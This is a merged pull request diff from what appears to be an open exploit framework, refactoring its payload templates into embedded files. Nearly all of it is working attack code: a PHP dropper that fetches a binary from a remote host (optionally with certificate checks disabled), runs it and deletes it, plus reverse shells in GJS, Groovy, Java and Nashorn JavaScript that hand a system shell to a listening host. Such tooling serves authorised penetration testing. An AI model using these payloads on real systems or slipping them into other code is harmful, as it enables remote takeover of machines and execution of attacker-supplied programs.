Merge pull request #308 from vulncheck-oss/payload/unify-layout

Seperate payloads into embedded independent files

Author: j-baines

payload/dropper/php.go

@@ -1,31 +1,22 @@
 package dropper
 
 import (
+	_ "embed"
 	"fmt"
 )
 
+var (
+	//go:embed php/dropper.php
+	PHPDropper string
+	//go:embed php/dropper_secure.php
+	PHPDropperSecure string
+)
+
 // Using PHP: download a remote file, write a tmp file, set it to executable, execute it, and delete it.
 func (php *PHPPayload) HTTP(lhost string, lport int, ssl bool, downloadFile string) string {
-	cmd := "<?php "
 	if ssl {
-		// download the data over ssl (ignoring cert validation)
-		cmd += `$options = array("ssl" => array("verify_peer" => false,"verify_peer_name" => false,),);`
-		cmd += `$context = stream_context_create($options);`
-		cmd += fmt.Sprintf(`$d = file_get_contents("https://%s:%d/%s", false, $context);`, lhost, lport, downloadFile)
-	} else {
-		// download the data
-		cmd += fmt.Sprintf(`$d = file_get_contents("http://%s:%d/%s");`, lhost, lport, downloadFile)
+		return fmt.Sprintf(PHPDropperSecure, lhost, lport, downloadFile)
 	}
-	// generate a random file
-	cmd += `$o=tempnam(sys_get_temp_dir(), "");`
-	// write the data
-	cmd += `file_put_contents($o,$d);`
-	// set the download binary as executable
-	cmd += `chmod($o, 0755);`
-	// execute it
-	cmd += `exec($o);`
-	// delete it
-	cmd += `unlink($o); ?>`
 
-	return cmd
+	return fmt.Sprintf(PHPDropper, lhost, lport, downloadFile)
 }

payload/dropper/php/dropper.php

@@ -0,0 +1 @@
+<?php $d = file_get_contents("http://%s:%d/%s");$o=tempnam(sys_get_temp_dir(), "");file_put_contents($o,$d);chmod($o, 0755);exec($o);unlink($o); ?>

payload/dropper/php/dropper_secure.php

@@ -0,0 +1 @@
+<?php $options = array("ssl" => array("verify_peer" => false,"verify_peer_name" => false,),);$context = stream_context_create($options);$d = file_get_contents("https://%s:%d/%s", false, $context);$o=tempnam(sys_get_temp_dir(), "");file_put_contents($o,$d);chmod($o, 0755);exec($o);unlink($o); ?>

payload/reverse/gjscript.go

@@ -1,35 +1,22 @@
 package reverse
 
 import (
+	_ "embed"
 	"fmt"
+	"strings"
 )
 
-const (
-	GJScriptDefault   = GJScriptGLibSpawn
-	GJScriptGLibSpawn = `const Gio = imports.gi.Gio;
-const GLib = imports.gi.GLib;
-
-try {
-	let connection = (new Gio.SocketClient()).connect_to_host("%s:%d", null, null);
-	let output = connection.get_output_stream();
-	let input = new Gio.DataInputStream({ base_stream: connection.get_input_stream() });
-
-	while (true) {
-		let [cmd, size] = input.read_line(null);
-		let [res, out, err, status] = GLib.spawn_command_line_sync(imports.byteArray.toString(cmd));
-		output.write_bytes(new GLib.Bytes(imports.byteArray.toString(out)), null);
-	}
-} catch (e) {
-}`
-)
+//go:embed gjscript/glib_spawn.gjs
+var GJScriptGLibSpawn string
+var GJScriptDefault = GJScriptGLibSpawn
 
 // Generates Gnome JS payload.
 func (gjs *GJScriptPayload) Default(lhost string, lport int) string {
-	return fmt.Sprintf(GJScriptDefault, lhost, lport)
+	return strings.Trim(fmt.Sprintf(GJScriptDefault, lhost, lport), "\r\n")
 }
 
 // Generates a script that can be used to create a reverse shell via
 // gjs (Gnome JS - present on Ubuntu, Debian by default).
 func (gjs *GJScriptPayload) GLibSpawn(lhost string, lport int) string {
-	return fmt.Sprintf(GJScriptGLibSpawn, lhost, lport)
+	return strings.Trim(fmt.Sprintf(GJScriptGLibSpawn, lhost, lport), "\r\n")
 }

payload/reverse/gjscript/glib_spawn.gjs

@@ -0,0 +1,15 @@
+const Gio = imports.gi.Gio;
+const GLib = imports.gi.GLib;
+
+try {
+	let connection = (new Gio.SocketClient()).connect_to_host("%s:%d", null, null);
+	let output = connection.get_output_stream();
+	let input = new Gio.DataInputStream({ base_stream: connection.get_input_stream() });
+
+	while (true) {
+		let [cmd, size] = input.read_line(null);
+		let [res, out, err, status] = GLib.spawn_command_line_sync(imports.byteArray.toString(cmd));
+		output.write_bytes(new GLib.Bytes(imports.byteArray.toString(out)), null);
+	}
+} catch (e) {
+}

payload/reverse/groovy.go

@@ -1,25 +1,22 @@
 package reverse
 
 import (
+	_ "embed"
 	"fmt"
+	"strings"
 )
 
-const (
+var (
+	//go:embed groovy/classic.groovy
+	GroovyClassic string
 	GroovyDefault = GroovyClassic
-	GroovyClassic = `shell='/bin/sh';if(System.getProperty('os.name').indexOf('Windows')!=-1)` +
-		`shell='cmd.exe';Process p=new ProcessBuilder(shell).redirectErrorStream(true).start();` +
-		`Socket s=new Socket('%s',%d);InputStream pi=p.getInputStream(),pe=p.getErrorStream(),` +
-		`si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();` +
-		`while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)` +
-		`so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();` +
-		`Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();`
 )
 
 func (groovy *GroovyPayload) Default(lhost string, lport int) string {
-	return groovy.GroovyClassic(lhost, lport)
+	return strings.Trim(groovy.GroovyClassic(lhost, lport), "\r\n")
 }
 
 // A short payload that creates a reverse shell using /bin/sh -i.
 func (groovy *GroovyPayload) GroovyClassic(lhost string, lport int) string {
-	return fmt.Sprintf(GroovyClassic, lhost, lport)
+	return strings.Trim(fmt.Sprintf(GroovyClassic, lhost, lport), "\r\n")
 }

payload/reverse/groovy/classic.groovy

@@ -0,0 +1 @@
+shell='/bin/sh';if(System.getProperty('os.name').indexOf('Windows')!=-1)shell='cmd.exe';Process p=new ProcessBuilder(shell).redirectErrorStream(true).start();Socket s=new Socket('%s',%d);InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

payload/reverse/java.go

@@ -1,42 +1,24 @@
 package reverse
 
 import (
+	_ "embed"
 	"fmt"
+	"strings"
 )
 
-const (
+var (
+	//go:embed java/process_builder.java
+	JavaProcessBuilderInteractive string
 	JavaDefault                   = JavaProcessBuilderInteractive
-	JavaProcessBuilderInteractive = `String shell = "/bin/sh";
-if (System.getProperty("os.name").indexOf("Windows") != -1) {
-	shell = "cmd.exe";
-};
-Process p = new ProcessBuilder(shell).redirectErrorStream(true).start();
-Socket s = new Socket("%s", %d);
-InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
-OutputStream po = p.getOutputStream(), so = s.getOutputStream();
-while (!s.isClosed()) {
-	while (pi.available() > 0) so.write(pi.read());
-	while (pe.available() > 0) so.write(pe.read());
-	while (si.available() > 0) po.write(si.read());
-	so.flush();
-	po.flush();
-	Thread.sleep(50);
-	try {
-		p.exitValue();
-		break;
-	} catch (Exception e) {}
-};
-p.destroy();
-s.close();`
 )
 
 // Defaults to the UnflattenedJava payload.
 func (java *JavaPayload) Default(lhost string, lport int) string {
-	return java.UnflattenedJava(lhost, lport)
+	return strings.Trim(java.UnflattenedJava(lhost, lport), "\r\n")
 }
 
 // An unflattened Java reverse shell. This is the "classic" Java reverse shell that spins out
 // the shell using ProcessBuilder and then redirects input/output to/from the sockets.
 func (java *JavaPayload) UnflattenedJava(lhost string, lport int) string {
-	return fmt.Sprintf(JavaProcessBuilderInteractive, lhost, lport)
+	return strings.Trim(fmt.Sprintf(JavaProcessBuilderInteractive, lhost, lport), "\r\n")
 }

payload/reverse/java/process_builder.java

@@ -0,0 +1,22 @@
+String shell = "/bin/sh";
+if (System.getProperty("os.name").indexOf("Windows") != -1) {
+	shell = "cmd.exe";
+};
+Process p = new ProcessBuilder(shell).redirectErrorStream(true).start();
+Socket s = new Socket("%s", %d);
+InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
+OutputStream po = p.getOutputStream(), so = s.getOutputStream();
+while (!s.isClosed()) {
+	while (pi.available() > 0) so.write(pi.read());
+	while (pe.available() > 0) so.write(pe.read());
+	while (si.available() > 0) po.write(si.read());
+	so.flush();
+	po.flush();
+	Thread.sleep(50);
+	try {
+		p.exitValue();
+		break;
+	} catch (Exception e) {}
+};
+p.destroy();
+s.close();

payload/reverse/jjs.go

@@ -1,7 +1,17 @@
 package reverse
 
 import (
+	_ "embed"
 	"fmt"
+	"strings"
+)
+
+var (
+	//go:embed jjs/reverse_shell.jjs
+	JJSShell string
+
+	//go:embed jjs/reverse_shell_ssl.jjs
+	JJSShellSSL string
 )
 
 // Generates a script that can be used to create a reverse shell via jjs (Java javascript).
@@ -14,57 +24,12 @@ import (
 // https://redthunder.blog/2018/04/09/disabling-hostname-validation-in-nashorn-javascript/
 // https://gist.github.com/frohoff/8e7c2bf3737032a25051
 func (jjs *JJSScriptPayload) Default(lhost string, lport int, ssl bool) string {
-	script := `var shell = "bash";
-if (java.lang.System.getProperty("os.name").indexOf("Windows") != -1) {
-	shell = "cmd.exe";
-}
-var p=new java.lang.ProcessBuilder(shell).redirectErrorStream(true).start();`
+	var script string
 	if ssl {
-		script += fmt.Sprintf(`
-var X509TrustManager = Java.type("javax.net.ssl.X509TrustManager");
-var permissiveTrustManager = Java.extend(X509TrustManager,
-  {
-    getAcceptedIssuers: function(){return null;},
-    checkClientTrusted: function(certs, authType){return;},
-    checkServerTrusted: function(certs, authType){return;}
-  }
-);
-var trustAllCerts = [new permissiveTrustManager()];
-var sc = javax.net.ssl.SSLContext.getInstance("TLS");
-sc.init(null, trustAllCerts, new java.security.SecureRandom());
-var factory = sc.getSocketFactory();
-var s=factory.createSocket("%s", %d);
-s.startHandshake()`, lhost, lport)
+		script = strings.Trim(fmt.Sprintf(JJSShellSSL, lhost, lport), "\r\n")
 	} else {
-		script += fmt.Sprintf(`var s=new java.net.Socket("%s", %d);`, lhost, lport)
-	}
-	script += `
-var socketInput = new java.io.BufferedReader(new java.io.InputStreamReader(s.getInputStream()));
-var socketOutput = new java.io.BufferedWriter(new java.io.OutputStreamWriter(s.getOutputStream()));
-var processInput = new java.io.BufferedWriter(new java.io.OutputStreamWriter(p.getOutputStream()));
-var processOutput = new java.io.BufferedReader(new java.io.InputStreamReader(p.getInputStream()));
-
-while (!s.isClosed()) {
-	var data
-	if ((data = socketInput.readLine()) != null) {
-		processInput.write(data + "\n");
-		processInput.flush()
+		script = strings.Trim(fmt.Sprintf(JJSShell, lhost, lport), "\r\n")
 	}
-	java.lang.Thread.sleep(50);
-
-	while (processOutput.ready() && (data = processOutput.read()) > 0) {
-			socketOutput.write(data);
-	}
-	socketOutput.flush()
-	try {
-		p.exitValue();
-		break;
-	} catch (e) {
-	}
-}
-
-p.destroy();
-s.close();`
 
 	return script
 }

payload/reverse/jjs/reverse_shell.jjs

@@ -0,0 +1,31 @@
+var shell = "bash";
+if (java.lang.System.getProperty("os.name").indexOf("Windows") != -1) {
+	shell = "cmd.exe";
+}
+var p=new java.lang.ProcessBuilder(shell).redirectErrorStream(true).start();var s=new java.net.Socket("%s", %d);
+var socketInput = new java.io.BufferedReader(new java.io.InputStreamReader(s.getInputStream()));
+var socketOutput = new java.io.BufferedWriter(new java.io.OutputStreamWriter(s.getOutputStream()));
+var processInput = new java.io.BufferedWriter(new java.io.OutputStreamWriter(p.getOutputStream()));
+var processOutput = new java.io.BufferedReader(new java.io.InputStreamReader(p.getInputStream()));
+
+while (!s.isClosed()) {
+	var data
+	if ((data = socketInput.readLine()) != null) {
+		processInput.write(data + "\n");
+		processInput.flush()
+	}
+	java.lang.Thread.sleep(50);
+
+	while (processOutput.ready() && (data = processOutput.read()) > 0) {
+			socketOutput.write(data);
+	}
+	socketOutput.flush()
+	try {
+		p.exitValue();
+		break;
+	} catch (e) {
+	}
+}
+
+p.destroy();
+s.close();

payload/reverse/jjs/reverse_shell_ssl.jjs

@@ -0,0 +1,45 @@
+var shell = "bash";
+if (java.lang.System.getProperty("os.name").indexOf("Windows") != -1) {
+	shell = "cmd.exe";
+}
+var p=new java.lang.ProcessBuilder(shell).redirectErrorStream(true).start();
+var X509TrustManager = Java.type("javax.net.ssl.X509TrustManager");
+var permissiveTrustManager = Java.extend(X509TrustManager,
+  {
+    getAcceptedIssuers: function(){return null;},
+    checkClientTrusted: function(certs, authType){return;},
+    checkServerTrusted: function(certs, authType){return;}
+  }
+);
+var trustAllCerts = [new permissiveTrustManager()];
+var sc = javax.net.ssl.SSLContext.getInstance("TLS");
+sc.init(null, trustAllCerts, new java.security.SecureRandom());
+var factory = sc.getSocketFactory();
+var s=factory.createSocket("%s", %d);
+s.startHandshake()
+var socketInput = new java.io.BufferedReader(new java.io.InputStreamReader(s.getInputStream()));
+var socketOutput = new java.io.BufferedWriter(new java.io.OutputStreamWriter(s.getOutputStream()));
+var processInput = new java.io.BufferedWriter(new java.io.OutputStreamWriter(p.getOutputStream()));
+var processOutput = new java.io.BufferedReader(new java.io.InputStreamReader(p.getInputStream()));
+
+while (!s.isClosed()) {
+	var data
+	if ((data = socketInput.readLine()) != null) {
+		processInput.write(data + "\n");
+		processInput.flush()
+	}
+	java.lang.Thread.sleep(50);
+
+	while (processOutput.ready() && (data = processOutput.read()) > 0) {
+			socketOutput.write(data);
+	}
+	socketOutput.flush()
+	try {
+		p.exitValue();
+		break;
+	} catch (e) {
+	}
+}
+
+p.destroy();
+s.close();